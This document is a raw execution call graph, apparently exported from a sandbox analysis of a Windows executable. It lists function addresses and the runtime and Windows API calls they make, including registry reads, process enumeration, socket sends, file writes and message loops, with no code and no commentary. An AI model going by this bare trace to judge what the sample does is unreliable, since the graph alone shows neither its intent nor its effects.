                          execution_graph 63458 b1e975 63474 b2010a 63458->63474 63460 b1ea27 GetModuleFileNameW 63483 b2297d 63460->63483 63462 b1ea5b _wcsncat 63486 b22bff 63462->63486 63465 b2010a 48 API calls 63466 b1ea94 _wcscpy 63465->63466 63489 b0d3d2 63466->63489 63470 b1eae0 Mailbox 63471 b0a4f6 48 API calls 63473 b1eada _wcscat __wsetenvp _wcsncpy 63471->63473 63472 b2010a 48 API calls 63472->63473 63473->63470 63473->63471 63473->63472 63476 b20112 __calloc_impl 63474->63476 63477 b2012c 63476->63477 63478 b2012e std::exception::exception 63476->63478 63508 b245ec 63476->63508 63477->63460 63522 b27495 RaiseException 63478->63522 63480 b20158 63523 b273cb 47 API calls _free 63480->63523 63482 b2016a 63482->63460 63530 b229c7 63483->63530 63556 b2aab9 63486->63556 63490 b2010a 48 API calls 63489->63490 63491 b0d3f3 63490->63491 63492 b2010a 48 API calls 63491->63492 63493 b0d401 63492->63493 63494 b1eb05 63493->63494 63568 b0c4cd 63494->63568 63496 b1eb14 RegOpenKeyExW 63497 b74b17 RegQueryValueExW 63496->63497 63498 b1eb35 63496->63498 63499 b74b91 RegCloseKey 63497->63499 63500 b74b30 63497->63500 63498->63473 63501 b2010a 48 API calls 63500->63501 63502 b74b49 63501->63502 63572 b04bce 63502->63572 63505 b74b6f 63575 b07e53 63505->63575 63507 b74b86 63507->63499 63509 b24667 __calloc_impl 63508->63509 63517 b245f8 __calloc_impl 63508->63517 63529 b2889e 47 API calls __getptd_noexit 63509->63529 63512 b2462b RtlAllocateHeap 63512->63517 63521 b2465f 63512->63521 63514 b24653 63527 b2889e 47 API calls __getptd_noexit 63514->63527 63517->63512 63517->63514 63518 b24651 63517->63518 63519 b24603 63517->63519 63528 b2889e 47 API calls __getptd_noexit 63518->63528 63519->63517 63524 b28e52 47 API calls 2 library calls 63519->63524 63525 b28eb2 47 API calls 8 library calls 63519->63525 63526 b21d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 63519->63526 63521->63476 63522->63480 63523->63482 63524->63519 63525->63519 63527->63518 63528->63521 63529->63521 63532 b229e2 63530->63532 63535 b229d6 63530->63535 63554 b2889e 47 API calls __getptd_noexit 63532->63554 63533 b22b9a 63539 b229c2 63533->63539 63555 b27aa0 8 API calls __mbschr_l 63533->63555 63535->63532 63541 b22a55 63535->63541 63549 b2a9fb 47 API calls __mbschr_l 63535->63549 63537 b22b21 63537->63532 63537->63539 63542 b22b31 63537->63542 63538 b22ae0 63538->63532 63540 b22afc 63538->63540 63551 b2a9fb 47 API calls __mbschr_l 63538->63551 63539->63462 63540->63532 63540->63539 63545 b22b12 63540->63545 63541->63532 63548 b22ac2 63541->63548 63550 b2a9fb 47 API calls __mbschr_l 63541->63550 63553 b2a9fb 47 API calls __mbschr_l 63542->63553 63552 b2a9fb 47 API calls __mbschr_l 63545->63552 63548->63537 63548->63538 63549->63541 63550->63548 63551->63540 63552->63539 63553->63539 63554->63533 63555->63539 63557 b2abc6 63556->63557 63558 b2aaca 63556->63558 63566 b2889e 47 API calls __getptd_noexit 63557->63566 63558->63557 63564 b2aad5 63558->63564 63562 b1ea8a 63562->63465 63563 b2abbb 63567 b27aa0 8 API calls __mbschr_l 63563->63567 63564->63562 63565 b2889e 47 API calls __getptd_noexit 63564->63565 63565->63563 63566->63563 63567->63562 63569 b0c4e7 63568->63569 63571 b0c4da 63568->63571 63570 b2010a 48 API calls 63569->63570 63570->63571 63571->63496 63573 b2010a 48 API calls 63572->63573 63574 b04be0 RegQueryValueExW 63573->63574 63574->63505 63574->63507 63576 b07ecf 63575->63576 63578 b07e5f __wsetenvp 63575->63578 63588 b0a2fb 63576->63588 63579 b07ec7 63578->63579 63580 b07e7b 63578->63580 63587 b07eda 48 API calls 63579->63587 63584 b0a6f8 63580->63584 63583 b07e85 _memmove 63583->63507 63585 b2010a 48 API calls 63584->63585 63587->63583 63589 b0a309 63588->63589 63591 b0a321 _memmove 63588->63591 63589->63591 63592 b0b8a7 63589->63592 63591->63583 63596 b1be17 63597 b0d3d2 48 API calls 63596->63597 63598 b1be85 63597->63598 63603 b1c929 63598->63603 63601 b1bf22 63602 b1bf3e 63601->63602 63606 b1c8b7 48 API calls _memmove 63601->63606 63607 b1c955 63603->63607 63606->63601 63608 b1c948 63607->63608 63609 b1c962 63607->63609 63608->63601 63609->63608 63610 b1c969 RegOpenKeyExW 63609->63610 63610->63608 63611 b1c983 RegQueryValueExW 63610->63611 63612 b1c9b9 RegCloseKey 63611->63612 63613 b1c9a4 63611->63613 63612->63608 63613->63612 63614 b10ff7 63709 b1e016 63614->63709 63616 b1100d 63718 b1e08f 63616->63718 63620 b7b6d2 63621 b10119 63733 b4d520 86 API calls 4 library calls 63621->63733 63624 b2010a 48 API calls 63635 b0fad8 63624->63635 63625 b11063 63732 b4d520 86 API calls 4 library calls 63625->63732 63626 b7b772 63734 b4d520 86 API calls 4 library calls 63626->63734 63627 b0c935 48 API calls 63627->63635 63629 b0fbf1 63630 b0d3d2 48 API calls 63630->63635 63631 b3a599 InterlockedDecrement 63631->63635 63633 b7b7d2 63634 b21b2a 52 API calls __cinit 63634->63635 63635->63621 63635->63624 63635->63625 63635->63626 63635->63627 63635->63629 63635->63630 63635->63631 63635->63634 63636 b1103d 63635->63636 63637 b0f6d0 63635->63637 63730 b11620 59 API calls Mailbox 63635->63730 63636->63629 63731 b4d520 86 API calls 4 library calls 63636->63731 63638 b0f708 63637->63638 63642 b0f77b 63637->63642 63639 b0f712 63638->63639 63640 b7c4d5 63638->63640 63641 b0f71c 63639->63641 63658 b7c544 63639->63658 63644 b7c4f4 63640->63644 63645 b7c4e2 63640->63645 63651 b7c6a4 63641->63651 63655 b0f72a 63641->63655 63704 b0f741 63641->63704 63646 b7c253 63642->63646 63691 b0f787 63642->63691 63805 b5c235 339 API calls Mailbox 63644->63805 63735 b5f34f 63645->63735 63796 b4d520 86 API calls 4 library calls 63646->63796 63648 b7c585 63659 b7c5a4 63648->63659 63660 b7c590 63648->63660 63654 b0c935 48 API calls 63651->63654 63652 b7c264 63652->63635 63653 b7c507 63657 b7c50b 63653->63657 63653->63704 63654->63704 63655->63704 63862 b3a599 InterlockedDecrement 63655->63862 63806 b4d520 86 API calls 4 library calls 63657->63806 63658->63648 63669 b7c569 63658->63669 63808 b5d154 48 API calls 63659->63808 63662 b5f34f 339 API calls 63660->63662 63662->63704 63664 b7c45a 63801 b0c935 63664->63801 63666 b7c7b5 63673 b7c7eb 63666->63673 63894 b5ef9d 90 API calls Mailbox 63666->63894 63667 b7c5af 63681 b7c62c 63667->63681 63693 b7c5d1 63667->63693 63807 b4d520 86 API calls 4 library calls 63669->63807 63670 b0f84a 63676 b7c32a 63670->63676 63688 b0f854 63670->63688 63674 b0d89e 50 API calls 63673->63674 63706 b0f770 Mailbox 63674->63706 63797 b0342c 48 API calls 63676->63797 63677 b7c793 63864 b084a6 63677->63864 63833 b4afce 48 API calls 63681->63833 63682 b7c7c9 63686 b084a6 81 API calls 63682->63686 63683 b22241 48 API calls 63683->63691 63684 b0f8bb 63684->63652 63684->63664 63684->63704 63798 b3a599 InterlockedDecrement 63684->63798 63800 b5f4df 339 API calls 63684->63800 63696 b7c7d1 __wsetenvp 63686->63696 63780 b114a0 63688->63780 63689 b0f8ab 63689->63684 63692 b0f9d8 63689->63692 63691->63670 63691->63683 63691->63684 63691->63692 63691->63706 63758 b0fa40 63691->63758 63799 b4d520 86 API calls 4 library calls 63692->63799 63809 b4a485 48 API calls 63693->63809 63694 b7c63e 63834 b1df08 48 API calls 63694->63834 63695 b7c79b __wsetenvp 63695->63666 63884 b0d89e 63695->63884 63696->63673 63700 b0d89e 50 API calls 63696->63700 63700->63673 63701 b7c647 Mailbox 63835 b4a485 48 API calls 63701->63835 63702 b7c5f6 63810 b144e0 63702->63810 63704->63666 63704->63706 63863 b5ee52 82 API calls 2 library calls 63704->63863 63706->63635 63707 b7c663 63836 b13680 63707->63836 63710 b1e022 63709->63710 63711 b1e034 63709->63711 63712 b0d89e 50 API calls 63710->63712 63713 b1e063 63711->63713 63714 b1e03a 63711->63714 63717 b1e02c 63712->63717 63716 b0d89e 50 API calls 63713->63716 63715 b2010a 48 API calls 63714->63715 63715->63717 63716->63717 63717->63616 63719 b07b6e 48 API calls 63718->63719 63720 b1e0b4 _wcscmp 63719->63720 63721 b0caee 48 API calls 63720->63721 63724 b1e0e2 Mailbox 63720->63724 63722 b7b9c7 63721->63722 64810 b07b4b 48 API calls Mailbox 63722->64810 63724->63635 63725 b7b9d5 63726 b0d2d2 53 API calls 63725->63726 63727 b7b9e7 63726->63727 63728 b0d89e 50 API calls 63727->63728 63729 b7b9ec Mailbox 63727->63729 63728->63729 63730->63635 63731->63625 63732->63620 63733->63626 63734->63633 63736 b0d3d2 48 API calls 63735->63736 63737 b5f389 Mailbox 63736->63737 63739 b5f3e1 63737->63739 63740 b5f3cd 63737->63740 63754 b5f3a9 63737->63754 63738 b0d89e 50 API calls 63757 b5f421 Mailbox 63738->63757 63742 b0c935 48 API calls 63739->63742 63741 b07e53 48 API calls 63740->63741 63743 b5f3df 63741->63743 63742->63743 63748 b5f429 63743->63748 63901 b5cdb5 339 API calls 63743->63901 63746 b5f410 63747 b5f414 63746->63747 63746->63748 63902 b4d338 86 API calls 4 library calls 63747->63902 63895 b5cd12 63748->63895 63749 b5f44b 63751 b5f457 63749->63751 63752 b5f4a2 63749->63752 63751->63754 63755 b5f476 63751->63755 63753 b5f34f 339 API calls 63752->63753 63753->63757 63754->63738 63903 b0ca8e 63755->63903 63757->63704 63759 b0fa60 63758->63759 63778 b0fa8e 63758->63778 63760 b2010a 48 API calls 63759->63760 63760->63778 63761 b21b2a 52 API calls __cinit 63761->63778 63762 b11063 63987 b4d520 86 API calls 4 library calls 63762->63987 63763 b2010a 48 API calls 63763->63778 63765 b10119 63988 b4d520 86 API calls 4 library calls 63765->63988 63768 b7b772 63989 b4d520 86 API calls 4 library calls 63768->63989 63769 b0f6d0 339 API calls 63769->63778 63770 b0c935 48 API calls 63770->63778 63772 b0fbf1 63772->63691 63773 b0d3d2 48 API calls 63773->63778 63774 b7b6d2 63776 b7b7d2 63777 b3a599 InterlockedDecrement 63777->63778 63778->63761 63778->63762 63778->63763 63778->63765 63778->63768 63778->63769 63778->63770 63778->63772 63778->63773 63778->63777 63779 b11230 63778->63779 63985 b11620 59 API calls Mailbox 63778->63985 63779->63772 63986 b4d520 86 API calls 4 library calls 63779->63986 63781 b11606 63780->63781 63783 b114b2 63780->63783 63781->63689 63782 b114be 63787 b114c9 63782->63787 63991 b0346e 48 API calls 63782->63991 63783->63782 63785 b2010a 48 API calls 63783->63785 63786 b75299 63785->63786 63788 b2010a 48 API calls 63786->63788 63789 b1156d 63787->63789 63790 b2010a 48 API calls 63787->63790 63795 b752a4 63788->63795 63789->63689 63791 b115af 63790->63791 63792 b115c2 63791->63792 63990 b1d6b4 48 API calls 63791->63990 63792->63689 63794 b2010a 48 API calls 63794->63795 63795->63782 63795->63794 63796->63652 63797->63684 63798->63684 63799->63706 63800->63684 63802 b0c940 63801->63802 63803 b0c948 63801->63803 63992 b0d805 63802->63992 63803->63704 63805->63653 63806->63706 63807->63706 63808->63667 63809->63702 63811 b14537 63810->63811 63812 b1469f 63810->63812 63814 b14543 63811->63814 63815 b77820 63811->63815 63813 b0caee 48 API calls 63812->63813 63822 b145e4 Mailbox 63813->63822 63996 b14040 63814->63996 64169 b5e713 339 API calls Mailbox 63815->64169 63818 b14639 Mailbox 63818->63704 63819 b7782c 63819->63818 64170 b4d520 86 API calls 4 library calls 63819->64170 63821 b14559 63821->63818 63821->63819 63821->63822 64011 b61f19 63822->64011 64014 b1f55e 63822->64014 64023 b51080 63822->64023 64026 b6352a 63822->64026 64114 b4efcd 63822->64114 64146 b595af WSAStartup 63822->64146 64148 b050ec 63822->64148 64152 b56fc3 63822->64152 64155 b4dce9 63822->64155 64160 b59500 63822->64160 63833->63694 63834->63701 63835->63707 64776 b0a9a0 63836->64776 63838 b136e7 63859 b13793 Mailbox _memmove 63838->63859 64788 b1bc04 86 API calls 63838->64788 63840 b4d520 86 API calls 63840->63859 63848 b0d380 55 API calls 63848->63859 63850 b2010a 48 API calls 63850->63859 63851 b0fa40 339 API calls 63851->63859 63852 b1bc5c 48 API calls 63852->63859 63853 b0d89e 50 API calls 63853->63859 63856 b0e1f0 339 API calls 63856->63859 63857 b1baef 48 API calls 63857->63859 63858 b0c935 48 API calls 63858->63859 63859->63840 63859->63848 63859->63850 63859->63851 63859->63852 63859->63853 63859->63856 63859->63857 63859->63858 63861 b13ab5 Mailbox 63859->63861 64781 b010e8 63859->64781 64789 b0d500 53 API calls __cinit 63859->64789 64790 b0d420 53 API calls 63859->64790 64791 b0d2d2 63859->64791 64797 b5f211 339 API calls 63859->64797 64798 b5f4df 339 API calls 63859->64798 64799 b1cf79 49 API calls 63859->64799 64800 b5d21a 82 API calls Mailbox 63859->64800 64801 b489e0 53 API calls 63859->64801 64802 b0d772 55 API calls 63859->64802 64803 b4d231 50 API calls 63859->64803 63861->63704 63862->63704 63863->63677 63865 b084be 63864->63865 63877 b084ba 63864->63877 63866 b75592 __i64tow 63865->63866 63867 b084d2 63865->63867 63868 b75494 63865->63868 63876 b084ea __itow Mailbox _wcscpy 63865->63876 64807 b2234b 80 API calls 3 library calls 63867->64807 63869 b7549d 63868->63869 63870 b7557a 63868->63870 63875 b754bc 63869->63875 63869->63876 64808 b2234b 80 API calls 3 library calls 63870->64808 63873 b2010a 48 API calls 63874 b084f4 63873->63874 63874->63877 63879 b0caee 48 API calls 63874->63879 63878 b2010a 48 API calls 63875->63878 63876->63873 63877->63695 63880 b754d9 63878->63880 63879->63877 63881 b2010a 48 API calls 63880->63881 63882 b754ff 63881->63882 63882->63877 63883 b0caee 48 API calls 63882->63883 63883->63877 63885 b0d8ac 63884->63885 63892 b0d8db Mailbox 63884->63892 63886 b0d8ff 63885->63886 63888 b0d8b2 Mailbox 63885->63888 63887 b0c935 48 API calls 63886->63887 63887->63892 63889 b0d8c7 63888->63889 63890 b74e9b 63888->63890 63891 b74e72 VariantClear 63889->63891 63889->63892 63890->63892 64809 b3a599 InterlockedDecrement 63890->64809 63891->63892 63892->63666 63894->63682 63896 b5cd21 63895->63896 63897 b5cd46 63895->63897 63898 b0ca8e 48 API calls 63896->63898 63897->63749 63899 b5cd2d 63898->63899 63917 b5c8b7 63899->63917 63901->63746 63902->63757 63904 b0cad0 63903->63904 63905 b0ca9a 63903->63905 63906 b0cae3 63904->63906 63907 b0cad9 63904->63907 63910 b2010a 48 API calls 63905->63910 63909 b0c4cd 48 API calls 63906->63909 63908 b07e53 48 API calls 63907->63908 63914 b0cac6 63908->63914 63909->63914 63911 b0caad 63910->63911 63912 b74f11 63911->63912 63913 b0cab8 63911->63913 63912->63914 63915 b0d3d2 48 API calls 63912->63915 63913->63914 63981 b0caee 63913->63981 63914->63757 63915->63914 63919 b5c914 63917->63919 63920 b5c8f7 63917->63920 63975 b5c235 339 API calls Mailbox 63919->63975 63920->63919 63921 b5cc61 63920->63921 63922 b5c934 63920->63922 63923 b5cc6e 63921->63923 63924 b5cca9 63921->63924 63922->63919 63953 b3abf3 63922->63953 63971 b1d6b4 48 API calls 63923->63971 63924->63919 63927 b5ccb6 63924->63927 63926 b5c964 63926->63919 63928 b5c973 63926->63928 63973 b1d6b4 48 API calls 63927->63973 63940 b5c9a1 63928->63940 63957 b3a8c8 63928->63957 63930 b5cc87 63972 b497b6 89 API calls 63930->63972 63934 b5ccd6 63974 b4503c 91 API calls Mailbox 63934->63974 63936 b5cadc VariantInit 63943 b5cb11 _memset 63936->63943 63939 b5ca4a 63939->63936 63941 b5ca86 VariantClear 63939->63941 63940->63939 63967 b3a25b 106 API calls 63940->63967 63941->63939 63942 b5caa5 SysAllocString 63941->63942 63942->63939 63944 b5cb8e 63943->63944 63945 b5cbb4 63943->63945 63968 b5c235 339 API calls Mailbox 63944->63968 63969 b4a6f6 103 API calls 63945->63969 63948 b5cbad 63949 b5cc41 VariantClear 63948->63949 63950 b5cc52 63949->63950 63950->63897 63951 b5cbce 63951->63949 63970 b4a6f6 103 API calls 63951->63970 63954 b3ac04 __wsetenvp 63953->63954 63956 b3ac16 63953->63956 63954->63956 63976 b03bcf 63954->63976 63956->63926 63959 b3a8f2 63957->63959 63958 b3a9ed SysFreeString 63962 b3a9f9 63958->63962 63959->63958 63960 b3a90a 63959->63960 63961 b3aa7e 63959->63961 63959->63962 63960->63940 63961->63960 63961->63962 63963 b3aad9 SysFreeString 63961->63963 63964 b3aac9 lstrcmpiW 63961->63964 63962->63960 63980 b3a78a RaiseException 63962->63980 63963->63961 63964->63963 63966 b3aafa SysFreeString 63964->63966 63966->63962 63967->63940 63968->63948 63969->63951 63970->63951 63971->63930 63972->63950 63973->63934 63974->63950 63975->63950 63977 b03bd9 __wsetenvp 63976->63977 63978 b2010a 48 API calls 63977->63978 63979 b03bee _wcscpy 63978->63979 63979->63956 63980->63962 63982 b0cafd __wsetenvp _memmove 63981->63982 63983 b2010a 48 API calls 63982->63983 63984 b0cb3b 63983->63984 63984->63914 63985->63778 63986->63762 63987->63774 63988->63768 63989->63776 63990->63792 63991->63787 63994 b0d815 63992->63994 63995 b0d828 _memmove 63992->63995 63993 b2010a 48 API calls 63993->63995 63994->63993 63994->63995 63995->63803 63997 b7787b 63996->63997 64000 b1406c 63996->64000 64172 b4d520 86 API calls 4 library calls 63997->64172 63999 b7788c 64173 b4d520 86 API calls 4 library calls 63999->64173 64000->63999 64010 b140a6 _memmove 64000->64010 64002 b14185 64002->63821 64003 b14175 64003->64002 64171 b5d21a 82 API calls Mailbox 64003->64171 64005 b141f1 64005->63821 64006 b2010a 48 API calls 64006->64010 64007 b0fa40 339 API calls 64007->64010 64008 b778d8 64174 b4d520 86 API calls 4 library calls 64008->64174 64010->64002 64010->64003 64010->64006 64010->64007 64010->64008 64175 b623c5 64011->64175 64015 b0cdb4 48 API calls 64014->64015 64016 b1f572 64015->64016 64017 b775d1 Sleep 64016->64017 64018 b1f57a timeGetTime 64016->64018 64019 b0cdb4 48 API calls 64018->64019 64020 b1f590 64019->64020 64265 b0e1f0 64020->64265 64497 b522e5 64023->64497 64025 b51090 64025->63818 64027 b0d3d2 48 API calls 64026->64027 64028 b6354a 64027->64028 64029 b0d3d2 48 API calls 64028->64029 64030 b63553 64029->64030 64031 b0d3d2 48 API calls 64030->64031 64032 b6355c 64031->64032 64033 b084a6 81 API calls 64032->64033 64042 b635e9 Mailbox 64032->64042 64034 b63580 64033->64034 64687 b63d7b 64034->64687 64042->63818 64115 b084a6 81 API calls 64114->64115 64116 b4eff2 64115->64116 64748 b478ad GetFullPathNameW 64116->64748 64121 b4f04b CoInitialize 64123 b4f06c 64121->64123 64124 b084a6 81 API calls 64123->64124 64131 b4f070 Mailbox 64123->64131 64125 b4f09d 64124->64125 64131->63818 64147 b595e0 64146->64147 64147->63818 64149 b05105 64148->64149 64150 b050f6 64148->64150 64149->64150 64151 b0510a FindCloseChangeNotification 64149->64151 64150->63818 64151->64150 64153 b084a6 81 API calls 64152->64153 64154 b56fd6 SetWindowTextW 64153->64154 64154->63818 64156 b084a6 81 API calls 64155->64156 64157 b4dcfc 64156->64157 64764 b46d6d 64157->64764 64159 b4dd06 64159->63818 64161 b0cdb4 48 API calls 64160->64161 64162 b59515 64161->64162 64163 b4be47 50 API calls 64162->64163 64164 b59522 64163->64164 64165 b5952f send 64164->64165 64166 b59546 64165->64166 64167 b59552 WSAGetLastError 64166->64167 64168 b5956a 64166->64168 64167->64168 64168->63818 64169->63819 64170->63818 64171->64005 64172->63999 64173->64002 64174->64002 64176 b623eb _memset 64175->64176 64177 b62452 64176->64177 64178 b62428 64176->64178 64181 b0cdb4 48 API calls 64177->64181 64187 b62476 64177->64187 64253 b0cdb4 64178->64253 64180 b62433 64184 b0cdb4 48 API calls 64180->64184 64180->64187 64183 b62448 64181->64183 64182 b624b0 64186 b084a6 81 API calls 64182->64186 64189 b0cdb4 48 API calls 64183->64189 64184->64183 64185 b0cdb4 48 API calls 64185->64182 64188 b624d4 64186->64188 64187->64182 64187->64185 64190 b03bcf 48 API calls 64188->64190 64189->64187 64191 b624de 64190->64191 64192 b625a1 64191->64192 64193 b624e8 64191->64193 64195 b625d3 GetCurrentDirectoryW 64192->64195 64198 b084a6 81 API calls 64192->64198 64194 b084a6 81 API calls 64193->64194 64196 b624f9 64194->64196 64197 b2010a 48 API calls 64195->64197 64199 b03bcf 48 API calls 64196->64199 64200 b625f8 GetCurrentDirectoryW 64197->64200 64201 b625b8 64198->64201 64202 b62503 64199->64202 64203 b62605 64200->64203 64204 b03bcf 48 API calls 64201->64204 64205 b084a6 81 API calls 64202->64205 64209 b0ca8e 48 API calls 64203->64209 64214 b6263e 64203->64214 64206 b625c2 __wsetenvp 64204->64206 64206->64195 64206->64214 64254 b0cdc5 64253->64254 64255 b0cdca 64253->64255 64254->64255 64264 b22241 48 API calls 64254->64264 64255->64180 64257 b0ce07 64257->64180 64264->64257 64266 b0e216 64265->64266 64326 b0e226 Mailbox 64265->64326 64267 b0e670 64266->64267 64266->64326 64395 b1ecee 339 API calls 64267->64395 64268 b4d520 86 API calls 64268->64326 64269 b0e4e7 64271 b0e4fd 64269->64271 64396 b0322e 16 API calls 64269->64396 64271->63818 64273 b0e681 64273->64271 64274 b0e68e 64273->64274 64397 b1ec33 339 API calls Mailbox 64274->64397 64275 b0e26c PeekMessageW 64275->64326 64277 b0e695 LockWindowUpdate DestroyWindow GetMessageW 64277->64271 64280 b0e6c7 64277->64280 64278 b75b13 Sleep 64278->64326 64281 b762a7 TranslateMessage DispatchMessageW GetMessageW 64280->64281 64281->64281 64283 b1cf79 49 API calls 64283->64326 64285 b0e657 PeekMessageW 64285->64326 64286 b0e517 timeGetTime 64286->64326 64288 b2010a 48 API calls 64288->64326 64289 b0c935 48 API calls 64289->64326 64290 b0e641 TranslateMessage DispatchMessageW 64290->64285 64291 b75dfc WaitForSingleObject 64292 b75e19 GetExitCodeProcess CloseHandle 64291->64292 64291->64326 64292->64326 64293 b0d3d2 48 API calls 64322 b75cce Mailbox 64293->64322 64294 b76147 Sleep 64294->64322 64295 b0e6cc timeGetTime 64398 b1cf79 49 API calls 64295->64398 64296 b75feb Sleep 64296->64326 64301 b761de GetExitCodeProcess 64305 b761f4 WaitForSingleObject 64301->64305 64306 b7620a CloseHandle 64301->64306 64303 b01000 315 API calls 64303->64326 64305->64306 64305->64326 64306->64322 64307 b75cea Sleep 64307->64326 64308 b75cd7 Sleep 64308->64307 64309 b68a48 108 API calls 64309->64322 64310 b01dce 107 API calls 64310->64326 64312 b76266 Sleep 64312->64326 64313 b0caee 48 API calls 64313->64322 64318 b0fa40 315 API calls 64318->64326 64320 b144e0 315 API calls 64320->64326 64321 b13680 315 API calls 64321->64326 64322->64293 64322->64301 64322->64307 64322->64308 64322->64309 64322->64312 64322->64313 64322->64326 64400 b456dc 49 API calls Mailbox 64322->64400 64401 b1cf79 49 API calls 64322->64401 64402 b0d380 64322->64402 64406 b01000 339 API calls 64322->64406 64408 b5d12a 50 API calls 64322->64408 64409 b48355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 64322->64409 64410 b1e3a5 timeGetTime 64322->64410 64411 b46f5b CreateToolhelp32Snapshot Process32FirstW 64322->64411 64324 b0caee 48 API calls 64324->64326 64325 b0d380 55 API calls 64325->64326 64326->64268 64326->64269 64326->64275 64326->64278 64326->64283 64326->64285 64326->64286 64326->64288 64326->64289 64326->64290 64326->64291 64326->64294 64326->64295 64326->64296 64326->64303 64326->64307 64326->64310 64326->64318 64326->64320 64326->64321 64326->64322 64326->64324 64326->64325 64327 b0e7e0 64326->64327 64334 b0ea00 64326->64334 64384 b1f381 64326->64384 64389 b1ed1a 64326->64389 64394 b0e7b0 339 API calls Mailbox 64326->64394 64399 b68b20 48 API calls 64326->64399 64407 b1e3a5 timeGetTime 64326->64407 64328 b0e7fd 64327->64328 64330 b0e80f 64327->64330 64418 b0dcd0 64328->64418 64449 b4d520 86 API calls 4 library calls 64330->64449 64331 b0e806 64331->64326 64333 b798e8 64333->64333 64335 b0ea20 64334->64335 64336 b0fa40 339 API calls 64335->64336 64340 b0ea89 64335->64340 64337 b79919 64336->64337 64337->64340 64457 b4d520 86 API calls 4 library calls 64337->64457 64338 b799bc 64460 b4d520 86 API calls 4 library calls 64338->64460 64339 b0fa40 339 API calls 64366 b0ecd7 Mailbox 64339->64366 64345 b0d3d2 48 API calls 64340->64345 64364 b0eb18 64340->64364 64340->64366 64342 b0d3d2 48 API calls 64344 b79997 64342->64344 64459 b21b2a 52 API calls __cinit 64344->64459 64347 b79963 64345->64347 64458 b21b2a 52 API calls __cinit 64347->64458 64348 b0d380 55 API calls 64348->64366 64350 b79d70 64469 b5e2fb 339 API calls Mailbox 64350->64469 64352 b79e49 64474 b4d520 86 API calls 4 library calls 64352->64474 64353 b79dc2 64471 b4d520 86 API calls 4 library calls 64353->64471 64354 b79ddf 64472 b5c235 339 API calls Mailbox 64354->64472 64358 b0342c 48 API calls 64358->64366 64362 b114a0 48 API calls 64362->64366 64363 b79df7 64383 b0ef0c Mailbox 64363->64383 64473 b4d520 86 API calls 4 library calls 64363->64473 64364->64342 64364->64366 64366->64338 64366->64339 64366->64348 64366->64350 64366->64352 64366->64353 64366->64354 64366->64358 64366->64362 64367 b0f56f 64366->64367 64369 b0d805 48 API calls 64366->64369 64370 b4d520 86 API calls 64366->64370 64371 b79a3c 64366->64371 64366->64383 64461 b4a3ee 48 API calls 64366->64461 64462 b5ede9 339 API calls 64366->64462 64467 b3a599 InterlockedDecrement 64366->64467 64468 b5f4df 339 API calls 64366->64468 64367->64383 64470 b4d520 86 API calls 4 library calls 64367->64470 64369->64366 64370->64366 64463 b5d154 48 API calls 64371->64463 64373 b79a48 64375 b79a56 64373->64375 64376 b79a9b 64373->64376 64383->64326 64386 b7ee11 64384->64386 64388 b1f390 64384->64388 64385 b7ee46 64386->64385 64387 b7ee28 TranslateAcceleratorW 64386->64387 64387->64388 64388->64326 64390 b1ed2c 64389->64390 64391 b1ed34 64389->64391 64390->64326 64391->64390 64392 b1ed5e IsDialogMessageW 64391->64392 64393 b7ebec GetClassLongW 64391->64393 64392->64390 64392->64391 64393->64391 64393->64392 64394->64326 64395->64269 64396->64273 64397->64277 64398->64326 64399->64326 64400->64322 64401->64322 64403 b0d38b 64402->64403 64404 b0d3b4 64403->64404 64475 b0d772 55 API calls 64403->64475 64404->64322 64406->64322 64407->64326 64408->64322 64409->64322 64410->64322 64476 b479c2 64411->64476 64413 b46fa4 Process32NextW 64414 b47021 CloseHandle 64413->64414 64415 b46fa0 _wcscat 64413->64415 64414->64322 64415->64413 64415->64414 64416 b2297d __wsplitpath 47 API calls 64415->64416 64482 b21bc7 64415->64482 64416->64415 64419 b0fa40 339 API calls 64418->64419 64431 b0dd0f _memmove 64419->64431 64420 b78dbe 64456 b4d520 86 API calls 4 library calls 64420->64456 64422 b78ddc 64422->64422 64423 b0dd70 64423->64331 64424 b0e12b Mailbox 64428 b2010a 48 API calls 64424->64428 64425 b0e051 64426 b0e066 64425->64426 64427 b78daf 64425->64427 64439 b0decb _memmove 64428->64439 64431->64420 64431->64423 64431->64424 64432 b2010a 48 API calls 64431->64432 64434 b0deb7 64431->64434 64444 b0df29 64431->64444 64432->64431 64434->64424 64436 b0dec4 64434->64436 64438 b2010a 48 API calls 64436->64438 64437 b78d9e 64438->64439 64439->64444 64442 b0df64 64442->64331 64444->64425 64444->64437 64444->64442 64445 b78d76 64444->64445 64447 b78d51 64444->64447 64451 b05322 339 API calls 64444->64451 64449->64333 64451->64444 64456->64422 64457->64340 64458->64364 64459->64366 64460->64383 64461->64366 64462->64366 64463->64373 64467->64366 64468->64366 64469->64367 64470->64383 64471->64383 64472->64363 64473->64383 64474->64383 64475->64404 64477 b479e9 64476->64477 64481 b479d0 64476->64481 64493 b2224a 58 API calls __wcstoi64 64477->64493 64480 b479ef 64480->64415 64481->64477 64481->64480 64492 b222df GetStringTypeW wcstoxq 64481->64492 64483 b21bd3 64482->64483 64484 b21c48 64482->64484 64492->64481 64493->64480 64498 b52306 64497->64498 64499 b52365 64498->64499 64500 b5230a 64498->64500 64566 b1f0f3 48 API calls 64499->64566 64501 b2010a 48 API calls 64500->64501 64503 b52311 64501->64503 64505 b5231f 64503->64505 64553 b05080 49 API calls 64503->64553 64504 b52379 64508 b5234d 64504->64508 64511 b5243f 64504->64511 64514 b523bb 64504->64514 64507 b084a6 81 API calls 64505->64507 64509 b52331 64507->64509 64508->64025 64554 b04bf9 64509->64554 64573 b4be47 64511->64573 64517 b084a6 81 API calls 64514->64517 64515 b52446 64577 b4689f SetFilePointerEx SetFilePointerEx WriteFile 64515->64577 64523 b523c2 64517->64523 64519 b523f6 64535 b467dc 64519->64535 64520 b52400 64567 b07b6e 64520->64567 64523->64519 64523->64520 64529 b523fe Mailbox 64529->64508 64531 b050ec FindCloseChangeNotification 64529->64531 64533 b52490 64531->64533 64578 b04592 FindCloseChangeNotification 64533->64578 64536 b467f6 64535->64536 64537 b467ec 64535->64537 64539 b467fc 64536->64539 64540 b46808 64536->64540 64595 b46917 SetFilePointerEx SetFilePointerEx WriteFile 64537->64595 64596 b468b9 51 API calls 64539->64596 64541 b46824 64540->64541 64542 b46811 64540->64542 64579 b0a6d4 64541->64579 64544 b0a6d4 48 API calls 64542->64544 64546 b46816 64544->64546 64552 b467f4 Mailbox 64552->64529 64553->64505 64555 b050ec FindCloseChangeNotification 64554->64555 64556 b04c04 64555->64556 64635 b04b88 64556->64635 